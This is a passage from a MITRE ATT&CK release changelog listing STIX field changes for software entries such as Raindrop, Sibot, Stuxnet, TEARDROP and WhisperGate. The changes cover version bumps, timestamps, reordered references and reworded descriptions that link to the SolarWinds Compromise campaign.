external_references[4]['url']https://success.trendmicro.com/solution/000283381https://securelist.com/qakbot-technical-analysis/103931/
external_references[5]['source_name']Red Canary QbotATT QakBot April 2021
external_references[5]['description']Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.
external_references[5]['url']https://redcanary.com/threat-detection-report/threats/qbot/https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot
external_references[6]['source_name']Kaspersky QakBot September 2021Red Canary Qbot
external_references[6]['description']Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.
external_references[6]['url']https://securelist.com/qakbot-technical-analysis/103931/https://redcanary.com/threat-detection-report/threats/qbot/
external_references[7]['source_name']ATT QakBot April 2021Trend Micro Qakbot December 2020
external_references[7]['description']Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.
external_references[7]['url']https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbothttps://success.trendmicro.com/solution/000283381
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsInna Danilevich, U.S Bank

[S0662] RCSession

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 14:57:26.308000+00:002023-03-26 19:54:58.293000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0496] REvil

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 21:09:01.019000+00:002023-03-26 20:06:33.317000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[S0565] Raindrop

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Raindrop](https://attack.mitre.org/software/S0565) is a loat1[Raindrop](https://attack.mitre.org/software/S0565) is a loa
>der used by [APT29](https://attack.mitre.org/groups/G0016) t>der used by [APT29](https://attack.mitre.org/groups/G0016) t
>hat was discovered on some victim machines during investigat>hat was discovered on some victim machines during investigat
>ions related to the 2020 SolarWinds cyber intrusion. It was >ions related to the [SolarWinds Compromise](https://attack.m
>discovered in January 2021 and was likely used since at leas>itre.org/campaigns/C0024). It was discovered in January 2021
>t May 2020.(Citation: Symantec RAINDROP January 2021)(Citati> and was likely used since at least May 2020.(Citation: Syma
>on: Microsoft Deep Dive Solorigate January 2021)>ntec RAINDROP January 2021)(Citation: Microsoft Deep Dive So
 >lorigate January 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:16:26.590000+00:002023-03-27 19:53:24.461000+00:00
description[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
external_references[2]['source_name']Symantec RAINDROP January 2021Microsoft Deep Dive Solorigate January 2021
external_references[2]['description']Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.
external_references[2]['url']https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malwarehttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
external_references[3]['source_name']Microsoft Deep Dive Solorigate January 2021Symantec RAINDROP January 2021
external_references[3]['description']MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.
external_references[3]['url']https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0511] RegDuke

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-10-09 16:07:59.731000+00:002023-03-24 21:24:58.468000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0125] Remsec

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
external_referenceshttps://securelist.com/faq-the-projectsauron-apt/75533/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttp://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:41:25.889000+00:002023-03-28 20:28:28.088000+00:00
external_references[1]['source_name']ProjectSauronKaspersky ProjectSauron Blog
external_references[1]['description']ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog)Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.
external_references[2]['source_name']Symantec Strider BlogProjectSauron
external_references[2]['description']Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog)
external_references[3]['source_name']Kaspersky ProjectSauron BlogSymantec Strider Blog
external_references[3]['description']Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.
external_references[3]['url']https://securelist.com/faq-the-projectsauron-apt/75533/http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0174] Responder

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_aliases['Responder']
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 14:42:53.334000+00:002023-03-17 14:01:57.617000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0270] RogueRobin

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:06:39.526000+00:002023-03-22 05:24:35.812000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[S0085] S-Type

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-30 20:10:08.347000+00:002023-03-10 16:02:05.568000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0450] SHARPSTATS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 13:12:36.865000+00:002023-03-22 05:29:42.303000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0649] SMOKEDHAM

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 22:07:23.251000+00:002023-04-14 23:43:40.206000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0390] SQLRat

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:12:51.198000+00:002023-03-22 05:36:07.371000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0559] SUNBURST

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-29 19:52:40.476000+00:002023-03-27 20:01:39.552000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.32.4

[S0562] SUNSPOT

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:11:19.301000+00:002023-03-27 20:02:20.344000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0382] ServHelper

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-29 19:31:03.708000+00:002023-04-14 23:44:24.382000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0596] ShadowPad

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 19:31:36.083000+00:002023-03-26 20:09:03.093000+00:00
external_references[2]['url']https://content.fireeye.com/apt-41/rpt-apt41https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0589] Sibot

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[Sibot](https://attack.mitre.org/software/S0589) is dual-purt1[Sibot](https://attack.mitre.org/software/S0589) is dual-pur
>pose malware written in VBScript designed to achieve persist>pose malware written in VBScript designed to achieve persist
>ence on a compromised system as well as download and execute>ence on a compromised system as well as download and execute
> additional payloads. Microsoft discovered three [Sibot](htt> additional payloads. Microsoft discovered three [Sibot](htt
>ps://attack.mitre.org/software/S0589) variants in early 2021>ps://attack.mitre.org/software/S0589) variants in early 2021
> during its investigation of [APT29](https://attack.mitre.or> during its investigation of [APT29](https://attack.mitre.or
>g/groups/G0016) and the SolarWinds cyber intrusion campaign.>g/groups/G0016) and the [SolarWinds Compromise](https://atta
>(Citation: MSTIC NOBELIUM Mar 2021)>ck.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 
 >2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 23:33:55.403000+00:002023-03-27 19:54:34.154000+00:00
description[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0633] Sliver

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 15:49:25.284000+00:002023-01-17 22:14:02.852000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0603] Stuxnet

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1[Stuxnet](https://attack.mitre.org/software/S0603) was the ft1[Stuxnet](https://attack.mitre.org/software/S0603) was the f
>irst publicly reported piece of malware to specifically targ>irst publicly reported piece of malware to specifically targ
>et industrial control systems devices. [Stuxnet](https://att>et industrial control systems devices. [Stuxnet](https://att
>ack.mitre.org/software/S0603) is a large and complex piece o>ack.mitre.org/software/S0603) is a large and complex piece o
>f malware that utilized multiple different behaviors includi>f malware that utilized multiple different behaviors includi
>ng multiple zero-day vulnerabilities, a sophisticated Window>ng multiple zero-day vulnerabilities, a sophisticated Window
>s rootkit, and network infection routines.(Citation: Symante>s rootkit, and network infection routines.(Citation: Nicolas
>c W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-> Falliere, Liam O Murchu, Eric Chien February 2011)(Citation
>272-01)(Citation: ESET Stuxnet Under the Microscope)(Citatio>: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet U
>n: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/softwa>nder the Microscope)(Citation: Langer Stuxnet) [Stuxnet](htt
>re/S0603) was discovered in 2010, with some components being>ps://attack.mitre.org/software/S0603) was discovered in 2010
> used as early as November 2008.(Citation: Symantec W.32 Stu>, with some components being used as early as November 2008.
>xnet Dossier)>(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien Febru
 >ary 2011) 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 20:31:32.664000+00:002023-03-20 13:50:55.168000+00:00
description[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[1]['description'](Citation: Symantec W.32 Stuxnet Dossier)(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[4]['source_name']Symantec W.32 Stuxnet DossierNicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[4]['description']Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[4]['url']https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdfhttps://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
external_references[5]['description']Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0663] SysUpdate

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:03:47.435000+00:002023-03-20 16:32:21.733000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux

[S0096] Systeminfo

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 21:29:48.567000+00:002023-03-07 13:03:30.781000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0560] TEARDROP

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[TEARDROP](https://attack.mitre.org/software/S0560) is a memt1[TEARDROP](https://attack.mitre.org/software/S0560) is a mem
>ory-only dropper that was discovered on some victim machines>ory-only dropper that was discovered on some victim machines
> during investigations related to the 2020 SolarWinds cyber > during investigations related to the [SolarWinds Compromise
>intrusion. It was likely used by [APT29](https://attack.mitr>](https://attack.mitre.org/campaigns/C0024). It was likely u
>e.org/groups/G0016) since at least May 2020.(Citation: FireE>sed by [APT29](https://attack.mitre.org/groups/G0016) since 
>ye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep>at least May 2020.(Citation: FireEye SUNBURST Backdoor Decem
> Dive Solorigate January 2021)>ber 2020)(Citation: Microsoft Deep Dive Solorigate January 2
 >021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 12:13:17.872000+00:002023-03-27 19:55:35.688000+00:00
description[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024). It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigate January 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0263] TYPEFRAME

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 20:40:40.755000+00:002023-03-26 20:22:31.288000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0665] ThreatNeedle

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-13 19:50:38.792000+00:002023-03-26 20:18:23.760000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0668] TinyTurla

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 16:08:09.275000+00:002023-03-26 20:20:44.580000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0678] Torisma

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-13 21:11:36.982000+00:002023-03-21 11:45:38.621000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0682] TrailBlazer

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2022-02-08 16:20:46.242000+00:002023-03-27 19:56:40.741000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[S0386] Ursnif

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 20:38:14.681000+00:002023-03-22 05:42:32.541000+00:00
external_references[1]['source_name']UrsnifGozi-ISFB
external_references[1]['description'](Citation: NJCCIC Ursnif Sept 2016)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)
external_references[2]['source_name']Gozi-ISFBUrsnif
external_references[2]['description'](Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)(Citation: NJCCIC Ursnif Sept 2016)
external_references[3]['source_name']PE_URSNIFDreambot
external_references[3]['description'](Citation: TrendMicro Ursnif Mar 2015)(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)
external_references[4]['source_name']DreambotPE_URSNIF
external_references[4]['description'](Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)(Citation: TrendMicro Ursnif Mar 2015)
external_references[5]['source_name']NJCCIC Ursnif Sept 2016TrendMicro Ursnif Mar 2015
external_references[5]['description']NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.
external_references[5]['url']https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnifhttps://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992
external_references[6]['source_name']ProofPoint Ursnif Aug 2016NJCCIC Ursnif Sept 2016
external_references[6]['description']Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.
external_references[6]['url']https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionalityhttps://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif
external_references[7]['source_name']TrendMicro Ursnif Mar 2015ProofPoint Ursnif Aug 2016
external_references[7]['description']Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.
external_references[7]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0476] Valak

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-11-23 19:00:25.745000+00:002023-03-24 21:42:31.959000+00:00
external_references[1]['source_name']Cybereason Valak May 2020Unit 42 Valak July 2020
external_references[1]['description']Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
external_references[1]['url']https://www.cybereason.com/blog/valak-more-than-meets-the-eyehttps://unit42.paloaltonetworks.com/valak-evolution/
external_references[2]['source_name']Unit 42 Valak July 2020Cybereason Valak May 2020
external_references[2]['description']Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
external_references[2]['url']https://unit42.paloaltonetworks.com/valak-evolution/https://www.cybereason.com/blog/valak-more-than-meets-the-eye
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0180] Volgmer

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 13:57:35.783000+00:002023-03-26 20:40:35.183000+00:00
external_references[2]['source_name']US-CERT Volgmer Nov 2017US-CERT Volgmer 2 Nov 2017
external_references[2]['description']US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
external_references[2]['url']https://www.us-cert.gov/ncas/alerts/TA17-318Bhttps://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF
external_references[3]['source_name']US-CERT Volgmer 2 Nov 2017US-CERT Volgmer Nov 2017
external_references[3]['description']US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
external_references[3]['url']https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDFhttps://www.us-cert.gov/ncas/alerts/TA17-318B
external_references[4]['url']https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[S0689] WhisperGate

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1[WhisperGate](https://attack.mitre.org/software/S0689) is a t1[WhisperGate](https://attack.mitre.org/software/S0689) is a 
>multi-stage wiper designed to look like ransomware that has >multi-stage wiper designed to look like ransomware that has 
>been used in attacks against Ukraine since at least January >been used against multiple government, non-profit, and infor
>2022.(Citation: Cybereason WhisperGate February 2022)(Citati>mation technology organizations in Ukraine since at least Ja
>on: Unit 42 WhisperGate January 2022)(Citation: Microsoft Wh>nuary 2022.(Citation: Cybereason WhisperGate February 2022)(
>isperGate January 2022)>Citation: Unit 42 WhisperGate January 2022)(Citation: Micros
 >oft WhisperGate January 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 18:47:53.298000+00:002023-04-05 20:48:07.280000+00:00
description[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)
x_mitre_attack_spec_version3.0.03.1.0
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMatt Brenton, Zurich Global Information Security

[S0330] Zeus Panda

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 23:49:03.468000+00:002023-03-22 05:47:42.436000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0160] certutil

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-16 17:50:50.307000+00:002023-03-03 00:40:22.280000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[S0105] dsquery

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 13:34:53.355000+00:002023-01-04 18:56:27.812000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[S0108] netsh

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 12:41:22.189000+00:002023-01-17 22:14:55.797000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
Patches

[S0137] CORESHELL

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
external_referenceshttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://securelist.com/a-slice-of-2017-sofacy-activity/83930/
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:14:36.623000+00:002023-03-26 17:51:20.402000+00:00
external_references[2]['source_name']SofacySOURFACE
external_references[2]['description']This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)
external_references[3]['source_name']SOURFACEFireEye APT28 January 2017
external_references[3]['description'](Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
